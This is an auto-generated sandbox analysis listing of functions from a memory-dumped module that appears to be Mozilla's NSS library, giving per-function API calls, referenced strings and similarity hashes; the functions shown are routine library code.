Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 6ce304426c146da3f884dead7c3836bf6edac60a0b4c7bef053c03b7cc05316d
Instruction ID: f597531a9bc313827b16f43b4bce5e30f3cffbf1219a1600f06808b034439b8a
Opcode Fuzzy Hash: 6ce304426c146da3f884dead7c3836bf6edac60a0b4c7bef053c03b7cc05316d
Instruction Fuzzy Hash: 941174B5B002009BEF105F28DD45A6673BAFF0632DF144039E92987F21E7A1E806C78D

Function 6C7108D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C7109B3,0000001A,?), ref: 6C7108E9

Part of subcall function 6C700840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7008B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C7108FD

Part of subcall function 6C6FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6F8D2D,?,00000000,?), ref: 6C6FFB85
Part of subcall function 6C6FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6FFBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C710939
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C710953

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: 4709b1318738edf1cd891b64b6ac90ac73c43d1ace8c525a3d5cd240df7a89b2
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: D50126B1A0934A2BFB149A369D20B673B9CAF40218F084039EC1AC6F41FB31E424CA95

Function 6C72EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C717FFA,?,6C719767,?,8B7874C0,0000A48E), ref: 6C72EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C717FFA,?,6C719767,?,8B7874C0,0000A48E), ref: 6C72EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C717FFA,?,6C719767,?,8B7874C0,0000A48E), ref: 6C72EE14

Part of subcall function 6C700BE0: malloc.MOZGLUE(6C6F8D2D,?,00000000,?), ref: 6C700BF8
Part of subcall function 6C700BE0: TlsGetValue.KERNEL32(6C6F8D2D,?,00000000,?), ref: 6C700C15

memcpy.VCRUNTIME140(?,?,6C719767,00000000,00000000,6C717FFA,?,6C719767,?,8B7874C0,0000A48E), ref: 6C72EE33

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 86287a858bd645639cad61efccb3eb59eea372b68ad9fa6258508d9240b08694
Instruction ID: ac8a898f11d6ccecfc82ca37666bd66f591fb7500f4996db69259bdc0a320cd8
Opcode Fuzzy Hash: 86287a858bd645639cad61efccb3eb59eea372b68ad9fa6258508d9240b08694
Instruction Fuzzy Hash: 2811C2B1E0070AABEB109E75DE88B46B3ACFF0035EF244535E91996A00E339F464C7E1

Function 6C6C8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6C8DE7
EnterCriticalSection.KERNEL32 ref: 6C6C8DFC
PR_Unlock.NSS3 ref: 6C6C8E2D
PR_SetError.NSS3 ref: 6C6C8E49

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 44a4f2a2cc3ef7fdaa96cdf4b5643ae5fc8820cb5581859e1c5cf4bf8b322165
Instruction ID: 67490586239815ccf44760d8cf8bcd84e281f082bcceffafc33a038f3695d9a5
Opcode Fuzzy Hash: 44a4f2a2cc3ef7fdaa96cdf4b5643ae5fc8820cb5581859e1c5cf4bf8b322165
Instruction Fuzzy Hash: 59119E75605A049FD710AF78D5886AABBF4FF09314F01496ADC88DBB00E730E894CBC6

Function 6C74AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C735F17,?,?,?,?,?,?,?,?,6C73AAD4), ref: 6C74AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C735F17,?,?,?,?,?,?,?,?,6C73AAD4), ref: 6C74ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C73AAD4), ref: 6C74ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C73AAD4), ref: 6C74ACDB

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 4d20a5160079bf6fa13ee2521424e4113e5239bb90d6a5848a5e4f4e82c23186
Instruction ID: a35926bffbe1a3682e08561c759ecd0c0c1b0788fb3f96997a28ef2b423c0234
Opcode Fuzzy Hash: 4d20a5160079bf6fa13ee2521424e4113e5239bb90d6a5848a5e4f4e82c23186
Instruction Fuzzy Hash: DC0152B1601B019BD760DF29E944753B7E8BF04666B104839D85AC3E10E731F054CBD1

Function 6C6F88E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,6C7008AA,?), ref: 6C6F88F6
EnterCriticalSection.KERNEL32(?,?,?,?,6C7008AA,?), ref: 6C6F890B
PR_NotifyCondVar.NSS3(?,?,?,?,?,6C7008AA,?), ref: 6C6F8936
PR_Unlock.NSS3(?,?,?,?,?,6C7008AA,?), ref: 6C6F8940

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CondCriticalEnterNotifySectionUnlockValue
String ID:
API String ID: 959714679-0
Opcode ID: c6f8d7012c808c9d3d77b6a3e94e358e6448b7dfafcebeab53e8109691e32697
Instruction ID: 8eac88e739da826a7fdcfa20d124fb47c83ea18e0b6afe92450733154fc476f2
Opcode Fuzzy Hash: c6f8d7012c808c9d3d77b6a3e94e358e6448b7dfafcebeab53e8109691e32697
Instruction Fuzzy Hash: 440184746046059BDB00AF3EC485655B7F8FF0A398F014A6AD8E887B10E730E895CBC6

Function 6C730840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C802F88,6C730660,00000020,00000000,?,?,6C732C3D,?,00000000,00000000,?,6C732A28,00000060,00000001), ref: 6C730860

Part of subcall function 6C624C70: TlsGetValue.KERNEL32(?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624C97
Part of subcall function 6C624C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CB0
Part of subcall function 6C624C70: PR_Unlock.NSS3(?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6C732C3D,?,00000000,00000000,?,6C732A28,00000060,00000001), ref: 6C730874
EnterCriticalSection.KERNEL32(00000001), ref: 6C730884
PR_Unlock.NSS3 ref: 6C7308A3

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: 73861c116e6c42b587381388d2057223e0ff81df483157560b8300856d63ad90
Instruction ID: 087e88e9b8817dd4eb8a4a350f89f58e44aaf5eef83dbb8d4836e4ccb116fcf3
Opcode Fuzzy Hash: 73861c116e6c42b587381388d2057223e0ff81df483157560b8300856d63ad90
Instruction Fuzzy Hash: 1E01997AB002546BEB202F2AED48E957B38EF1736DF080575EC0C52A03EB229454CBE1

Function 6C7308D0 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3 ref: 6C7308F1

Part of subcall function 6C624C70: TlsGetValue.KERNEL32(?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624C97
Part of subcall function 6C624C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CB0
Part of subcall function 6C624C70: PR_Unlock.NSS3(?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CC9

Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907AD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907CD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907D6
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C62204A), ref: 6C6907E4
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,6C62204A), ref: 6C690864
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C690880
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,6C62204A), ref: 6C6908CB
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908D7
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908FB

TlsGetValue.KERNEL32 ref: 6C730907
EnterCriticalSection.KERNEL32 ref: 6C73091C
PR_Unlock.NSS3 ref: 6C730933

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$CallOnce
String ID:
API String ID: 3443561666-0
Opcode ID: 06e9f6b7812d94b135045edfa392ce8e2cef5d4b64529c310209668a0a07beaf
Instruction ID: c247724b91bc3286107ce7f515488ae322a52e8fa11b4e28be4a4280e30f321d
Opcode Fuzzy Hash: 06e9f6b7812d94b135045edfa392ce8e2cef5d4b64529c310209668a0a07beaf
Instruction Fuzzy Hash: 3E0175757052448FEB10AF78D54946ABBB4EF46268F044979DC8C47701E734D495CBD2

Function 6C7BCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C7BCC61
free.MOZGLUE ref: 6C7BCC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C7BCC80
free.MOZGLUE(?), ref: 6C7BCC87

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 5cea3abb15dace4fb20695c899c2ad8fab1f408cf45e3f4e72191ecdb3694e96
Instruction ID: 9c208d4ab094bc54a6f3e58429515de097daa13ac426df3b0466e5f9ffd56ccb
Opcode Fuzzy Hash: 5cea3abb15dace4fb20695c899c2ad8fab1f408cf45e3f4e72191ecdb3694e96
Instruction Fuzzy Hash: A0E030767006089BCA10EFA8DC8488677ACFE492717150565E691C3740D231F915CBA1

Function 6C6F4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6F4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C6F4DE6

Strings

%d.%d, xrefs: 6C6F4DDE

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 44eea057373e325760ae1efd72104ed258393057882064ca127748d3c2145de2
Instruction ID: eb6f4ae7d7ad6d403368b5e5337a37d821ad273944aaea213bc06c2b4ab632e3
Opcode Fuzzy Hash: 44eea057373e325760ae1efd72104ed258393057882064ca127748d3c2145de2
Instruction Fuzzy Hash: 8F3130B2D042186BEB105BA59C05BFF77ADEF41308F050429ED255BB81EB709906CBFA

Function 6C790900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?), ref: 6C790917
sqlite3_value_text.NSS3(?), ref: 6C790923

Part of subcall function 6C6513C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C622352,?,00000000,?,?), ref: 6C651413
Part of subcall function 6C6513C0: memcpy.VCRUNTIME140(00000000,R#bl,00000002,?,?,?,?,6C622352,?,00000000,?,?), ref: 6C6514C0

Strings

error in %s %s%s%s: %s, xrefs: 6C790944

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_value_text$memcpystrlen
String ID: error in %s %s%s%s: %s
API String ID: 1937290486-1007276823
Opcode ID: 26e7ed2704ed15f5285b84102af6044198a9b464562037169e875568bbc0cf53
Instruction ID: 41b0a024d0c64d0d3e9d8d1a0eb0c844fe7af7ae4ccb2badd868bb01abde137e
Opcode Fuzzy Hash: 26e7ed2704ed15f5285b84102af6044198a9b464562037169e875568bbc0cf53
Instruction Fuzzy Hash: 350108BAE001499FD7009F18FD419BA7BB5EFC5218F144439ED485B711F732AD2487A5

Function 6C714CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8ql,00000000,00000000,?,?,6C713827,?,00000000), ref: 6C714D0A

Part of subcall function 6C700840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7008B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C714D22

Part of subcall function 6C6FFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C6A1A3E,00000048,00000054), ref: 6C6FFD56

Strings

'8ql, xrefs: 6C714D07

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8ql
API String ID: 1521942269-1157208439
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: ce4fe90d34fd06d73e558d217d21555afc2e3772216b3df77e89074b05e66aa3
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: BCF0967261522467EF104D6AAE85B4336DC9B4167DF1C02B1EE68CBF81E671CC01D6E2

Function 6C73AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C73AF78

Part of subcall function 6C69ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C69ACE2
Part of subcall function 6C69ACC0: malloc.MOZGLUE(00000001), ref: 6C69ACEC
Part of subcall function 6C69ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C69AD02
Part of subcall function 6C69ACC0: TlsGetValue.KERNEL32 ref: 6C69AD3C
Part of subcall function 6C69ACC0: calloc.MOZGLUE(00000001,?), ref: 6C69AD8C
Part of subcall function 6C69ACC0: PR_Unlock.NSS3 ref: 6C69ADC0
Part of subcall function 6C69ACC0: PR_Unlock.NSS3 ref: 6C69AE8C
Part of subcall function 6C69ACC0: free.MOZGLUE(?), ref: 6C69AEAB

memcpy.VCRUNTIME140(6C803084,6C8002AC,00000090), ref: 6C73AF94

Strings

SSL, xrefs: 6C73AF73

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: fa82e44b990a689cd8f81e54ba774523be4fe8b3db6ec4086349e9b3d1a1430e
Instruction ID: 1eee592cd698fb7cce6563da219436035daec0705b4ee748921f47ed019adbdd
Opcode Fuzzy Hash: fa82e44b990a689cd8f81e54ba774523be4fe8b3db6ec4086349e9b3d1a1430e
Instruction Fuzzy Hash: 76214EB2717E689AEB20DF529B47B127AB4B30224DF10A22DC11D4FB26D3315804DFD9

Function 6C6AC810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]jl,6C6A6499,-00000078,00000000,?,?,]jl,?,6C6A5DEF,?), ref: 6C6AC821

Part of subcall function 6C6A1DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6A1E0B
Part of subcall function 6C6A1DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6A1E24

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]jl,?,6C6A5DEF,?,?,?), ref: 6C6AC857

Strings

]jl, xrefs: 6C6AC810

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
String ID: ]jl
API String ID: 221937774-2485981899
Opcode ID: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction ID: a1696e6dfb878b7f5121467197827b225ea58b545ae07462da21976407f909d5
Opcode Fuzzy Hash: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction Fuzzy Hash: AFF08276A0051477EF012AA56C04AEA3A99DF82259F040031FE1596651FB32CD2687ED

Function 6C690F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F1B

Part of subcall function 6C691370: GetSystemInfo.KERNEL32(?,?,?,?,6C690936,?,6C690F20,6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000), ref: 6C69138F

PR_NewLogModule.NSS3(clock,6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F25

Part of subcall function 6C691110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C690936,00000001,00000040), ref: 6C691130
Part of subcall function 6C691110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C690936,00000001,00000040), ref: 6C691142
Part of subcall function 6C691110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C690936,00000001), ref: 6C691167

Strings

clock, xrefs: 6C690F20

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

